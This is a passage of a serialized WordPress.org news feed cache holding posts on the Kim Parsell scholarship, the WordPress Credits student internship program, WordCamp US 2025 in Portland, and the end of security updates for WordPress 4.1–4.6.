alt=\"\" class=\"wp-image-18956\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/07/Kim-parsell-twitter-image-2.jpeg?w=400&amp;ssl=1 400w, https://i0.wp.com/wordpress.org/news/files/2025/07/Kim-parsell-twitter-image-2.jpeg?resize=300%2C300&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/07/Kim-parsell-twitter-image-2.jpeg?resize=150%2C150&amp;ssl=1 150w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" /></figure>\n</div>\n\n\n\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:60%\">\n<p>Kim Parsell was a dedicated contributor and a beloved member of the WordPress community. Her passion for open source and her welcoming spirit inspired many, both online and in person. Each year at WordCamp US, the WordPress Foundation celebrates Kim’s legacy by supporting contributors who share her commitment and enthusiasm. The Kim Parsell Memorial Scholarship aims to make it easier for deserving community members to attend WordCamp US, reflecting Kim’s belief in making WordPress accessible and inclusive for all.</p>\n</div>\n</div>\n\n\n\n<p style=\"padding-top:var(--wp--preset--spacing--10);padding-bottom:var(--wp--preset--spacing--10)\">If you’re unfamiliar with Kim’s story or her invaluable role in the community, we encourage you to <a href=\"https://us.wordcamp.org/2019/memories-of-kim-parsell/\">read these heartfelt tributes</a> collected from friends and colleagues.</p>\n</div>\n\n\n\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:2%\"></div>\n</div>\n</div>\n\n\n\n<h2 class=\"wp-block-heading\">Scholarship Eligibility</h2>\n\n\n\n<p>This year, a single scholarship will be awarded. To qualify, applicants must:</p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Identify as a woman</li>\n\n\n\n<li>Be actively involved as a contributor to WordPress</li>\n\n\n\n<li>Have never attended WordCamp US before</li>\n\n\n\n<li>Demonstrate a need for financial support to attend the event</li>\n</ul>\n\n\n\n<p>If you meet these qualifications, we invite you to apply before the July 25 deadline. All applicants will be notified of the decision by August 7, 2025.</p>\n\n\n\n<p>For additional information, visit the <a href=\"https://wordpressfoundation.org/projects/kim-parsell-memorial-scholarship/\">Kim Parsell Memorial Scholarship page</a> hosted by the WordPress Foundation.</p>\n\n\n\n<div class=\"wp-block-group has-off-white-2-background-color has-background is-layout-constrained wp-container-core-group-is-layout-8503c47b wp-block-group-is-layout-constrained\">\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<p class=\"has-text-align-center has-large-font-size\"><strong>Ready to Apply?</strong></p>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<div class=\"wp-block-buttons is-content-justification-center is-layout-flex wp-container-core-buttons-is-layout-a89b3969 wp-block-buttons-is-layout-flex\">\n<div class=\"wp-block-button\"><a class=\"wp-block-button__link has-text-align-center wp-element-button\" href=\"https://wordcampcentral.survey.fm/wcus-2025-kim-parsell-scholarship-application\">Submit Your Application Today</a></div>\n</div>\n\n\n\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n</div>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full has-custom-border\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"500\" height=\"333\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/07/kim-jose.jpeg?resize=500%2C333&#038;ssl=1\" alt=\"\" class=\"wp-image-18917\" style=\"border-width:25px;border-radius:40px\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/07/kim-jose.jpeg?w=500&amp;ssl=1 500w, https://i0.wp.com/wordpress.org/news/files/2025/07/kim-jose.jpeg?resize=300%2C200&amp;ssl=1 300w\" sizes=\"auto, (max-width: 500px) 100vw, 500px\" /></figure>\n\n\n\n<h2 class=\"wp-block-heading\">Join the Celebration</h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Tickets for WordCamp US 2025 are now available—secure yours soon!</li>\n\n\n\n<li>Volunteer applications are open until July 11, 2025</li>\n\n\n\n<li>Interested in supporting the event? Explore our <a>sponsorship opportunities</a></li>\n</ul>\n\n\n\n<p>Help us spread the word about this opportunity and make WordCamp US 2025 even more special.</p>\n\n\n\n<p></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"18911\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:63:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:92:\"Introducing WordPress Credits: A New Contribution Internship Program for University Students\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:127:\"https://wordpress.org/news/2025/07/introducing-wordpress-credits-a-new-contribution-internship-program-for-university-students/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 10 Jul 2025 16:56:52 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:9:\"Community\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:9:\"community\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:17:\"WordPress Credits\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=18913\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:393:\"The WordPress Foundation is proud to launch WordPress Credits, a contribution-focused internship program that brings university students into the heart of the WordPress open source project. While WordPress thrives on contributions from a global volunteer community, many students and newcomers face barriers to entry, such as a lack of structured guidance or real-world experience in [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Isotta Peira\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:4712:\"\n<p>The WordPress Foundation is proud to launch WordPress Credits, a contribution-focused internship program that brings university students into the heart of the WordPress open source project. While WordPress thrives on contributions from a global volunteer community, many students and newcomers face barriers to entry, such as a lack of structured guidance or real-world experience in open source projects. This new program is designed to bridge that gap, nurturing future contributors and ensuring WordPress remains innovative, inclusive, and sustainable for years to come.</p>\n\n\n\n<p>The <a href=\"https://gamma.app/docs/EN-WordPress-Credits-vz0k2vr1ulg91qq?mode=doc\">pilot program</a>, developed in partnership with the University of Pisa, was announced on stage at WordCamp Europe 2025 by Matt Mullenweg and Mary Hubbard. Since then, it has attracted interest from students across various fields of study, including humanities, computer science, and communication. Companies in the WordPress ecosystem have also expressed support and interest in contributing to the project. In response to the growing interest from both community members and academic institutions, we are now inviting more universities to join the initiative.</p>\n\n\n\n<p>Open to students from all fields of study, the program blends structured onboarding with a personalized contribution project. Activities are adapted to each student’s degree program and familiarity with WordPress, aiming to develop transferable skills, academic-related competencies, and active participation in the WordPress community. Internship durations may vary depending on the university or educational institution. Some may align with academic semesters (typically 3–4 months), while others, like the University of Pisa, allow students to sign up year-round with a requirement to complete a set number of contribution hours (e.g. 150 hours). Flexible arrangements can be discussed to meet the specific requirements of each institution.</p>\n\n\n\n<p>Foundational Training includes:</p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>An introduction to open source principles and the WordPress Foundation</li>\n\n\n\n<li>Getting familiar with community tools (Slack, Make blogs, Learn platform, GitHub)</li>\n\n\n\n<li>Setting up a personal WordPress site and publishing content</li>\n</ul>\n\n\n\n<p>Each student will choose a contribution area and design their own personal project within that area. Examples of possible projects include:</p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Translating interfaces or documentation</li>\n\n\n\n<li>Creating multilingual subtitles for educational videos</li>\n\n\n\n<li>Contributing code or performing testing</li>\n\n\n\n<li>Supporting product development or design</li>\n\n\n\n<li>Writing or editing content</li>\n\n\n\n<li>Assisting with community event organization</li>\n\n\n\n<li>Developing training materials for Learn WordPress</li>\n\n\n\n<li>Creating open source tools</li>\n\n\n\n<li>And much more…<br></li>\n</ul>\n\n\n\n<p>Interns are guided by an experienced mentor specific to their chosen area and supported by a dedicated WordPress Foundation contact person throughout the program. All student contributions, whether code, translations, documentation, or educational materials, will be publicly visible and integrated into official WordPress projects and resources, directly benefiting the wider community.</p>\n\n\n\n<p><strong>Interested universities and educational institutions</strong> interested in participating can reach out by filling <a href=\"https://airtable.com/appIzQKfwTn5dyPVp/shrYvY0CDNIkILIre\">the interest form</a>.</p>\n\n\n\n<p>We also invite companies in the WordPress ecosystem to support this initiative by sponsoring mentors who will guide and empower the next generation of contributors, or by providing tools and resources that help students succeed in their contribution journey.&nbsp;</p>\n\n\n\n<p><strong>If your company is interested in getting involved</strong>, please visit the <a href=\"https://make.wordpress.org/handbook/wordpress-credits-contribution-internship-program/get-involved-company-guide/\">Company Guide</a> to learn more and <a href=\"https://airtable.com/appIzQKfwTn5dyPVp/shrKDkjeUdw8Fof34\">fill out the form</a> to join the program.</p>\n\n\n\n<p><em>By welcoming students, mentors, sponsors, and volunteers into this initiative, we are building a stronger and more connected WordPress community. Each person who takes part, whether they guide a student, share their experiences, provide sponsorship, or simply help spread the word, helps ensure that open source remains vibrant and accessible for all. Together, we are not just supporting individual contributors; we are shaping the future of WordPress and open source itself.</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"18913\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:63:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"WordCamp US 2025: See You in Portland, Oregon!\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"https://wordpress.org/news/2025/06/wordcamp-us-2025-see-you-in-portland-oregon/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 27 Jun 2025 18:14:33 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:6:\"Events\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"WordCamp\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:4:\"WCUS\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=18884\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:383:\"WordCamp US 2025 is heading to vibrant Portland, Oregon, from August 26–29, 2025! Join fellow open source enthusiasts, developers, designers, and WordPress professionals from across the United States and around the world for four days of learning, networking, and collaboration at the Oregon Convention Center. Nestled in the Pacific Northwest, Portland is famous for its [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Brett McSherry\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:8274:\"\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/06/wordcamp-us-2025-portland.png?resize=1024%2C576&#038;ssl=1\" alt=\"\" class=\"wp-image-18885\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/06/wordcamp-us-2025-portland.png?resize=1024%2C576&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/06/wordcamp-us-2025-portland.png?resize=300%2C169&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/06/wordcamp-us-2025-portland.png?resize=768%2C432&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/06/wordcamp-us-2025-portland.png?w=1200&amp;ssl=1 1200w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /></figure>\n\n\n\n<p>WordCamp US 2025 is heading to vibrant Portland, Oregon, from August 26–29, 2025! Join fellow open source enthusiasts, developers, designers, and WordPress professionals from across the United States and around the world for four days of learning, networking, and collaboration at the Oregon Convention Center.</p>\n\n\n\n<p>Nestled in the Pacific Northwest, Portland is famous for its creative spirit, lush green spaces, and riverside trails, making it an inspiring backdrop for this year’s WordCamp. Whether building your first site or leading a digital agency, WordCamp US offers something for everyone, all set against the city’s stunning natural scenery.</p>\n\n\n\n<div class=\"wp-block-group has-off-white-background-color has-background is-layout-constrained wp-container-core-group-is-layout-8503c47b wp-block-group-is-layout-constrained\">\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<p class=\"has-text-align-center has-large-font-size\"><img src=\"https://s.w.org/images/core/emoji/16.0.1/72x72/1f39f.png\" alt=\"🎟\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" /> <strong>Tickets are limited—secure yours today!</strong></p>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<div class=\"wp-block-buttons is-content-justification-center is-layout-flex wp-container-core-buttons-is-layout-a89b3969 wp-block-buttons-is-layout-flex\">\n<div class=\"wp-block-button\"><a class=\"wp-block-button__link has-text-align-center wp-element-button\" href=\"https://us.wordcamp.org/2025/tickets/\">Get your ticket now</a></div>\n</div>\n\n\n\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n</div>\n\n\n\n<h2 class=\"wp-block-heading\">What to Expect</h2>\n\n\n\n<h3 class=\"wp-block-heading\">Contributor Day: August 26</h3>\n\n\n\n<p>Kick off your WordCamp US experience by giving back. Contributor Day welcomes all skill levels to collaborate on teams that help make WordPress better, from code to community to documentation. You can make a difference to the project, and build new friendships or rekindle old ones, perhaps even while enjoying views of Portland’s skyline and tree-lined streets.</p>\n\n\n\n<h3 class=\"wp-block-heading\">Main Conference: August 27–29</h3>\n\n\n\n<h4 class=\"wp-block-heading\">Showcase Day &#8211; August 27</h4>\n\n\n\n<p>As part of the main conference, day one will give us a look at project showcases, discover innovative uses of WordPress, see how people push the platform’s boundaries, and get inspired to try something new.</p>\n\n\n\n<h4 class=\"wp-block-heading\">Session Days + Expo Hall &#8211; August 28-29</h4>\n\n\n\n<p>Experience another two days filled with inspiring keynotes, practical sessions, and deep dives into the latest trends in web development, design, content, accessibility, and more. Hear from some of the brightest minds in the WordPress ecosystem and explore topics that get to the heart of what makes WordPress unique. Also, take some time to explore the main floors of WCUS, like the Sponsors Hall.</p>\n\n\n\n<h3 class=\"wp-block-heading\">Networking and Community</h3>\n\n\n\n<p>Meet WordPress friends new and old, exchange ideas with community leaders, and collaborate with people who share your passion for open source. Enjoy daily lunches and a memorable social event, all included with your ticket. Stroll along the Willamette River or explore nearby parks in between sessions.</p>\n\n\n\n<h3 class=\"wp-block-heading\">Venue &amp; Accommodations</h3>\n\n\n\n<p>This year, we’re gathering at the Oregon Convention Center in the heart of Portland—a city known for its vibrant neighborhoods and abundant green spaces. We’ve secured a special hotel block right across the street at the Hyatt Regency Portland for convenient, comfortable lodging during your stay.</p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong><img src=\"https://s.w.org/images/core/emoji/16.0.1/72x72/1f3e2.png\" alt=\"🏢\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" /></strong> <strong>Oregon Convention Center<br></strong>777 NE Martin Luther King Jr Blvd<br>Portland, OR 97232<br></li>\n\n\n\n<li><img src=\"https://s.w.org/images/core/emoji/16.0.1/72x72/1f6cf.png\" alt=\"🛏\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" /> <strong>Hyatt Regency Portland</strong><br>375 NE Holladay Street<br>Portland, OR 97232<br><a href=\"https://www.hyatt.com/en-US/group-booking/PDXRP/G-CAMP\">Book your room!</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\">Registration and Tickets</h2>\n\n\n\n<p>Registration officially kicked off last month. Secure your spot early; tickets are selling quickly.</p>\n\n\n\n<div class=\"wp-block-group has-off-white-background-color has-background is-layout-constrained wp-container-core-group-is-layout-8503c47b wp-block-group-is-layout-constrained\">\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<p class=\"has-text-align-center has-large-font-size\"><img src=\"https://s.w.org/images/core/emoji/16.0.1/72x72/1f39f.png\" alt=\"🎟\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" /> <strong>Tickets are limited—secure yours today!</strong></p>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<div class=\"wp-block-buttons is-content-justification-center is-layout-flex wp-container-core-buttons-is-layout-a89b3969 wp-block-buttons-is-layout-flex\">\n<div class=\"wp-block-button\"><a class=\"wp-block-button__link has-text-align-center wp-element-button\" href=\"https://us.wordcamp.org/2025/tickets/\">Get your ticket now</a></div>\n</div>\n\n\n\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n</div>\n\n\n\n<h2 class=\"wp-block-heading\">Ready to Plan Your WordCamp US Experience?</h2>\n\n\n\n<p>Keep checking the <a href=\"https://us.wordcamp.org/2025/\">WordCamp US site</a> for travel tips, to book accommodations, and to watch for the whole event schedule—coming soon! While here, why not plan to take in some of Portland’s scenic hiking trails, bike-friendly streets, or local food scene?</p>\n\n\n\n<p>Stay tuned for updates and announcements on <a href=\"https://make.wordpress.org/marketing/handbook/social-media/\">WordPress social media channels</a>, and join the conversation.</p>\n\n\n\n<h3 class=\"wp-block-heading\">Help Us Spread the Word!</h3>\n\n\n\n<p>Whether attending in person or following along online, share your experience and help welcome others to the WordPress community. Use the #WCUS and #WordPress hashtags and tell your story on social!</p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/06/wordcamp-us.jpg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-18898\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/06/wordcamp-us.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/06/wordcamp-us.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/06/wordcamp-us.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/06/wordcamp-us.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/06/wordcamp-us.jpg?w=2048&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /></figure>\n\n\n\n<p>Portland is calling—see you at WordCamp US 2025! <img src=\"https://s.w.org/images/core/emoji/16.0.1/72x72/1f332.png\" alt=\"🌲\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" /></p>\n\n\n\n<p></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"18884\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:60:\"\n		\n		\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"Dropping security updates for WordPress versions 4.1 through 4.6\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:100:\"https://wordpress.org/news/2025/06/dropping-security-updates-for-wordpress-versions-4-1-through-4-6/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 19 Jun 2025 15:26:06 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:8:\"Security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:7:\"Updates\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=18872\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:331:\"As of July 2025, the WordPress Security Team will no longer provide security updates for WordPress versions 4.1 through 4.6. These versions were first released nine or more years ago and over 99% of WordPress installations run a more recent version. The chances this will affect your site, or sites, is very small. If you [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"John Blackbourn\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:3132:\"\n<p>As of July 2025, the WordPress Security Team will no longer provide security updates for WordPress versions 4.1 through 4.6.</p>\n\n\n\n<p>These versions were first released nine or more years ago and over 99% of WordPress installations run a more recent version. The chances this will affect your site, or sites, is very small.</p>\n\n\n\n<p>If you are unsure if you are running an up-to-date version of WordPress, please log in to your site’s dashboard. Out of date versions will display a notice that looks like this:</p>\n\n\n\n<figure class=\"wp-block-image size-full has-custom-border\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1048\" height=\"122\" src=\"https://i0.wp.com/wordpress.org/news/files/2022/09/WordPress-681-update-notice.png?resize=1048%2C122&#038;ssl=1\" alt=\"Dashboard notice: &quot;WordPress 6.8.1 is available! Please update now.&quot;\" class=\"has-border-color has-luminous-vivid-amber-border-color wp-image-18873\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2022/09/WordPress-681-update-notice.png?w=1048&amp;ssl=1 1048w, https://i0.wp.com/wordpress.org/news/files/2022/09/WordPress-681-update-notice.png?resize=300%2C35&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2022/09/WordPress-681-update-notice.png?resize=1024%2C119&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2022/09/WordPress-681-update-notice.png?resize=768%2C89&amp;ssl=1 768w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /></figure>\n\n\n\n<p>The version you are running is displayed in the bottom of the “At a Glance” section of the dashboard.</p>\n\n\n\n<figure class=\"wp-block-image size-large has-custom-border\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"281\" src=\"https://i0.wp.com/wordpress.org/news/files/2022/09/at-a-glance-wp-4141.png?resize=1024%2C281&#038;ssl=1\" alt=\"At a glance widget showing a site running WordPress 4.1.41\" class=\"has-border-color has-cyan-bluish-gray-border-color wp-image-18875\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2022/09/at-a-glance-wp-4141.png?resize=1024%2C281&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2022/09/at-a-glance-wp-4141.png?resize=300%2C82&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2022/09/at-a-glance-wp-4141.png?resize=768%2C211&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2022/09/at-a-glance-wp-4141.png?resize=1536%2C421&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2022/09/at-a-glance-wp-4141.png?w=1798&amp;ssl=1 1798w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /></figure>\n\n\n\n<p>As a reminder, the only <em>actively</em> supported version of WordPress is the most recent one. Security updates are only backported to older branches as a courtesy.</p>\n\n\n\n<p>The Make WordPress Security blog has further details about <a href=\"https://make.wordpress.org/security/2025/06/18/security-updates-will-cease-for-wordpress-versions-4-1-through-4-6/\" data-type=\"link\" data-id=\"https://make.wordpress.org/security/2025/06/18/security-updates-will-cease-for-wordpress-versions-4-1-through-4-6/\">the process to end 